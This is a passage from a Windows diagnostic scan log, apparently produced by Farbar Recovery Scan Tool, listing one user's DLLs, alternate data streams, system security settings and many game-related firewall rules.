2022-07-14 23:10 - 2022-07-14 23:10 - 006270976 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Core.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 001389568 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Network.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000157184 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5WebSockets.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000210432 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Xml.dll
2021-09-14 00:46 - 2021-09-14 00:46 - 005979312 _____ (The Qt Company Oy -> The Qt Company Ltd.) [File not signed] C:\Users\Miggy\AppData\Local\MEGAsync\Qt5Core.dll
 
==================== Alternate Data Streams (Whitelisted) ========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log:F107EE40EF [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log_backup1:2DD1EC5C91 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log:CCC93B07B0 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log_backup1:AD433BF298 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log:72C8986B20 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log_backup1:97A90964FA [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log:C40F6B9209 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log_backup1:7CC29836A6 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log:AE3C879266 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log_backup1:AF8AA3CDC1 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log:DE1448F4D7 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log_backup1:D61270D3FD [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [3442]
AlternateDataStreams: C:\Users\Miggy\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Miggy\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [490]
 
==================== Safe Mode (Whitelisted) ==================
 
==================== Association (Whitelisted) =================
 
==================== Internet Explorer (Whitelisted) ==========
 
 
==================== Hosts content: =========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2018-04-11 16:38 - 2018-04-11 16:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
 
==================== Other Areas ===========================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Miggy\Downloads\FXHeNR8WYAAmLXM.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
==================== FirewallRules (Whitelisted) ================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [UDP Query User{3E12643C-7EBF-4744-B040-EEE763C56F6D}C:\users\miggy\appdata\local\programs\blitz\blitz.exe] => (Block) C:\users\miggy\appdata\local\programs\blitz\blitz.exe => No File
FirewallRules: [TCP Query User{8C8C4890-CEFB-4483-BC1B-8DA87FE83F73}C:\users\miggy\appdata\local\programs\blitz\blitz.exe] => (Block) C:\users\miggy\appdata\local\programs\blitz\blitz.exe => No File
FirewallRules: [{BD298CC7-821E-4819-9A26-698385BA3B7A}] => (Allow) C:\Program Files\BlueStacks\HD-Player.exe => No File
FirewallRules: [UDP Query User{4A0EBC18-06EA-4C87-87A1-4C990E41C7D3}C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe] => (Block) C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe => No File
FirewallRules: [TCP Query User{D4275EA6-2DDD-4686-AA4D-9A3310805EEC}C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe] => (Block) C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe => No File
FirewallRules: [UDP Query User{0DA0174C-7AB4-49C7-BA8B-8D68E76E894D}C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe] => (Allow) C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe => No File
FirewallRules: [TCP Query User{E177F9D2-5A17-47BA-89BF-EE69CFBE5A1D}C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe] => (Allow) C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe => No File
FirewallRules: [UDP Query User{1B7CBF21-ED14-4267-9095-29AE1089A8A9}C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe] => (Block) C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe => No File
FirewallRules: [TCP Query User{FF5BFDBA-25C4-4DE2-A652-F568B110169F}C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe] => (Block) C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe => No File
FirewallRules: [{12F7E6E4-EF2A-4F53-B472-BA7450D5430E}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{24770BD1-E3E6-4572-A0D8-4D8A978D0057}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{27FA26BB-7CA1-4B1B-AE4F-B1FD29FF1AF9}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{825C03FC-D3B6-45B1-ADDC-7EFCEA4A440F}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{D40D2F7F-832F-4C48-B2B4-6CBBDB1883EB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe (Blue Mammoth Games) [File not signed]
FirewallRules: [{4DE15F9F-866B-4678-9B97-FB5256AE51F9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe (Blue Mammoth Games) [File not signed]
FirewallRules: [UDP Query User{4675CE24-74D3-4FD0-8949-9C33787B0DEB}C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe] => (Block) C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe => No File
FirewallRules: [TCP Query User{AD7E69AC-9D0E-4E38-B5D3-5771108ED725}C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe] => (Block) C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe => No File
FirewallRules: [{51E6F908-35D3-4FE6-8E6D-2BE375F7A4A1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\theHunter\launcher\launcher.exe => No File
FirewallRules: [{A117C129-8E57-4A5F-BFC1-ADE3AC7A8EC5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\theHunter\launcher\launcher.exe => No File
FirewallRules: [UDP Query User{A419095C-3A92-4308-BB4D-137DADFB2060}C:\program files\epic games\paladins\binaries\win64\paladins.exe] => (Block) C:\program files\epic games\paladins\binaries\win64\paladins.exe => No File
FirewallRules: [TCP Query User{EC003A0A-0F5B-4BC4-8027-127CDD34D741}C:\program files\epic games\paladins\binaries\win64\paladins.exe] => (Block) C:\program files\epic games\paladins\binaries\win64\paladins.exe => No File
FirewallRules: [{3E5B1C19-9C21-45C9-9314-7F0ED6E173C9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\surviv.io - 2D Battle Royale\survivio.exe (Kongregate, Inc.) [File not signed]
FirewallRules: [{DAC12A37-5149-425C-86B1-940BE44AF9C5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\surviv.io - 2D Battle Royale\survivio.exe (Kongregate, Inc.) [File not signed]
FirewallRules: [{B9F2E208-7EBC-4F05-A81E-CF26FE6EEF73}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CS2D\CS2D.exe => No File
FirewallRules: [{6A2F2F22-97A7-4FA2-BA98-545F68C9F3DA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CS2D\CS2D.exe => No File
FirewallRules: [UDP Query User{4DE89CAA-64B3-4356-9F39-88239528713C}C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe] => (Allow) C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe => No File
FirewallRules: [TCP Query User{6B8E16AD-44E7-4973-8143-46712B14266E}C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe] => (Allow) C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe => No File
FirewallRules: [{8876B45B-FEDC-4E54-9ADF-7F59DA13B3DC}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{7A09F2B5-A1B3-4584-8E04-F95AB8846A6F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [UDP Query User{F2106FD5-AF63-4F80-B266-400CD20A79BA}C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe => No File
FirewallRules: [TCP Query User{C406884C-8D72-4D1E-AD55-57B21037C24B}C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe => No File
FirewallRules: [UDP Query User{CA1B8127-55F9-47D2-AE87-01BF3285F80A}C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe] => (Block) C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe => No File
FirewallRules: [TCP Query User{6F812FB8-9408-430F-9BEA-8F87DF1E666A}C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe] => (Block) C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe => No File
FirewallRules: [{F45FC709-9DB9-4BF4-AF32-48037B4B1E88}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CreativeDestruction\client.exe => No File
FirewallRules: [{A7BE5101-300C-4F37-B0C6-5D6F9343BFBA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CreativeDestruction\client.exe => No File
FirewallRules: [{819F6E51-8D7C-46F9-8C49-728C026C4D49}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{5FA7B7A1-F6BA-495F-BBE1-0A3F7E9BA093}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{8CC426E1-EEDA-4929-8CA9-24A340632044}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{70728EF1-D77C-44BE-BDA7-AEC73EE3F99E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{A2E80910-BE5B-4FAB-AB98-C2AA35F89046}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{3035735B-83F5-4F06-BE7F-4BCC14DCEB99}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{E1A9225E-ED13-43F8-A5C3-F4F45FCC0D79}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{13629218-8017-449A-87B7-9DA4166140FA}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{65B4A04D-E3BC-447A-AC84-89535112CDC7}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{80EA8F03-E09D-471C-9C23-34DB1AFD0F7E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [TCP Query User{DCFED574-FBAA-4975-AB72-7F191FC99BC0}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{558C3052-13F1-48E1-92ED-E261F000125C}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{7709B928-D87B-4C08-9650-BD0D55B3CEAA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve Corp. -> )
FirewallRules: [{687D0ADB-4A66-4892-9CB6-7F917CFD3BBC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve Corp. -> )
FirewallRules: [{8BCE8CA2-FF28-4C33-8BA0-C864AF161A49}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TotallyAccurateBattlegrounds\TotallyAccurateBattlegrounds.exe => No File
FirewallRules: [{684DABB3-C018-4657-97BB-404804BD9CB1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TotallyAccurateBattlegrounds\TotallyAccurateBattlegrounds.exe => No File
FirewallRules: [TCP Query User{A61F39F5-AF5A-485E-9DA5-BCCA8CBC059D}C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe] => (Block) C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe () [File not signed]
FirewallRules: [UDP Query User{9DAD7DA6-8D85-43CC-A387-53B6B580375D}C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe] => (Block) C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe () [File not signed]
FirewallRules: [TCP Query User{BB752D12-153E-4A49-9DA1-E9B8C0985C29}C:\program files (x86)\overwatch\_retail_\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\_retail_\overwatch.exe (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
FirewallRules: [UDP Query User{C03FC8C5-DC18-4717-84EA-0F1A1B386F5F}C:\program files (x86)\overwatch\_retail_\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\_retail_\overwatch.exe (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
FirewallRules: [{4456857A-4FDC-4A8E-A64A-90D79024DC3C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [File not signed]
FirewallRules: [{EF3DBDB9-75BD-4185-A412-5AAC58B32B81}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [File not signed]
FirewallRules: [{356E3ED2-C9F8-4C1F-8D1E-A3E3ED5872AC}] => (Allow) C:\Users\Miggy\AppData\Roaming\Zoom\bin\Zoom.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [{67503904-3C3F-4311-AA42-3CE968E9459B}] => (Allow) C:\Users\Miggy\AppData\Roaming\Zoom\bin\airhost.exe => No File
FirewallRules: [{6600988A-3E8D-4BB2-9073-62009DDE9CFF}] => (Allow) C:\Users\Miggy\AppData\Roaming\Zoom\bin\airhost.exe => No File
FirewallRules: [TCP Query User{FBE7BF86-138D-479E-B64D-825C1350D34D}C:\program files\epic games\overcooked2\overcooked2.exe] => (Allow) C:\program files\epic games\overcooked2\overcooked2.exe => No File
FirewallRules: [UDP Query User{EAEFB3E2-272C-4380-9AD8-A679DBA3FD9C}C:\program files\epic games\overcooked2\overcooked2.exe] => (Allow) C:\program files\epic games\overcooked2\overcooked2.exe => No File
FirewallRules: [TCP Query User{CBA04267-ADE7-4A8F-98D5-1179FAB47424}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [UDP Query User{5599CAFE-FB21-4163-82A9-FFF8208FFCDF}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [TCP Query User{05814D12-6CA4-44EA-A1BB-B91ECB227500}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe () [File not signed]
FirewallRules: [UDP Query User{4DD2E8BC-DC9C-4519-8192-50B8A7C0624E}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe () [File not signed]
FirewallRules: [TCP Query User{45FCE454-50C4-44E0-A124-D38ED1D288FF}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{3B622155-C937-463E-BFD7-D4A45BACF17F}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [{149A11AC-6845-4F23-9AC0-25E31A853823}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{9E6ECAC2-5571-4810-91B9-B9FF72330AD0}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{1000DD04-D380-41DE-AFF9-1D848B29B0CB}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{7049F166-6EA5-48BA-89B7-C961956E64D1}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [TCP Query User{C0AB333E-B963-49AF-9D11-C36C98114DD9}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{5CC520B6-DAC6-4115-BB18-F039E1666639}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [{F60FB8AB-15F5-4D67-91BD-A47314F526C4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Deceit\bin\win_x64\Deceit.exe => No File
FirewallRules: [{BB6919EA-8FF7-47DB-BD1A-68ABBA53C6B0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Deceit\bin\win_x64\Deceit.exe => No File
FirewallRules: [{55BCF914-6939-43C0-9D57-681AF1273AFC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
FirewallRules: [{2E4C8ECF-4E93-45DF-B319-37EE82288616}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
FirewallRules: [TCP Query User{2904BFCE-FCC6-4FF5-B534-4ACFF3F0CFC8}C:\program files\epic games\hyperscape\hyperscape.exe] => (Allow) C:\program files\epic games\hyperscape\hyperscape.exe => No File
FirewallRules: [UDP Query User{62F001EC-E422-4990-BFD3-E1AB751FAE99}C:\program files\epic games\hyperscape\hyperscape.exe] => (Allow) C:\program files\epic games\hyperscape\hyperscape.exe => No File
FirewallRules: [{250CF44C-1F5D-4132-9FAB-DA648C1ABD26}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Splitgate\PortalWars\Binaries\Win64\PortalWars-Win64-Shipping.exe => No File
FirewallRules: [{0A964258-98FC-486F-B2EA-34A83CB40E3A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Splitgate\PortalWars\Binaries\Win64\PortalWars-Win64-Shipping.exe => No File
FirewallRules: [{47BD7F4A-BE92-48F0-B699-7F92C199E69A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Muck\Muck.exe () [File not signed]
FirewallRules: [{65CFA16F-BDC1-401E-A3F3-46394EF84F37}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Muck\Muck.exe () [File not signed]
FirewallRules: [TCP Query User{05E53D1F-8F73-4D83-88D4-E3EF1D21AAD0}C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe (Shawn Hitchcock) [File not signed]
FirewallRules: [UDP Query User{D2802595-8323-4996-A3DB-B2053205A57E}C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe (Shawn Hitchcock) [File not signed]
FirewallRules: [TCP Query User{91F12ED7-2766-4E6B-827B-B816725E6E09}C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe] => (Block) C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe => No File
FirewallRules: [UDP Query User{DCFB4155-590D-4220-B40D-25CB5C9BB385}C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe] => (Block) C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe => No File
FirewallRules: [TCP Query User{3DB8DFA7-2522-4AF8-ACC6-8D45B36F7373}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Block) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => No File
FirewallRules: [UDP Query User{39AFD781-AC7A-488C-8592-BE0915131F04}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Block) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => No File
FirewallRules: [TCP Query User{B333236D-5DE9-4EAE-BC1F-B00AAD0BB549}C:\program files\epic games\saintsrowthethird\srttr.exe] => (Allow) C:\program files\epic games\saintsrowthethird\srttr.exe => No File
FirewallRules: [UDP Query User{20E062AD-9148-410B-BDFD-326EED231C4F}C:\program files\epic games\saintsrowthethird\srttr.exe] => (Allow) C:\program files\epic games\saintsrowthethird\srttr.exe => No File
FirewallRules: [TCP Query User{EF14DFC7-AF28-49AF-8997-0F02030DB00D}C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe] => (Allow) C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe => No File
FirewallRules: [UDP Query User{21152F44-B05B-4BBF-A8EC-EDAF24C1BA14}C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe] => (Allow) C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe => No File
FirewallRules: [TCP Query User{CC80FBC5-71E4-426F-94D6-E20D2F782855}C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe] => (Allow) C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe => No File
FirewallRules: [UDP Query User{3A99AB51-E8C5-41DD-B517-C38486ED9C07}C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe] => (Allow) C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe => No File
FirewallRules: [TCP Query User{BD2E3FBB-6427-438C-A1D4-B16A68A3EF86}C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe] => (Allow) C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe => No File
FirewallRules: [UDP Query User{0B75CCC6-30BE-48C1-87ED-1FB923820B07}C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe] => (Allow) C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe => No File
FirewallRules: [TCP Query User{63DF027F-7F80-445C-BE62-9E4CCD612957}C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [UDP Query User{75585054-1A8D-4D89-B625-99B5D06A2676}C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [TCP Query User{FA3863B9-CA16-4FF0-9083-834839CC0557}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{D6ABD18D-3DAA-4EA5-A177-840605D6010C}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [{59C0890E-1D74-471F-B3F6-3F0DFB64CD8B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crab Game\Crab Game.exe () [File not signed]
FirewallRules: [{E40EC143-367E-4D37-A2AA-34EBAC71DE8B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crab Game\Crab Game.exe () [File not signed]
